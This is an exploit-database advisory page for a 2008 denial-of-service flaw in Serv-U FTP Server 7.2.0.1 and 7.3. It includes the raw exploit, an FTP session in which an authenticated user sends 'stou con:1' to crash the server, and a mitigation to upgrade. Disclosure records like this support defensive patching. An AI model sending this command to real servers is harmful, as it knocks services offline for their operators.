header-logo
Suggest Exploit
vendor:
Serv-U FTP Server
by:
dmnt
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Serv-U FTP Server
Affected Version From: 7.2.0.1
Affected Version To: 7.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:sunstone_software:serv-u_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Serv-U <= 7.2.0.1 / 7.3 ftp server DoS

A Denial of Service vulnerability exists in Serv-U FTP Server versions 7.2.0.1 and 7.3. An attacker with upload permissions can send a malicious 'STOU' command to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of Serv-U FTP Server.
Source

Exploit-DB raw data:

#Serv-U <= 7.2.0.1 / 7.3 ftp server DoS
#user must have upload permissions
#
#(x) dmnt 2008-10-01
 
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
stou con:1
quit
221 Goodbye, closing session.
# now server DoS'ed

# milw0rm.com [2008-10-03]

Navigation

Suggest Exploit

Services By CQR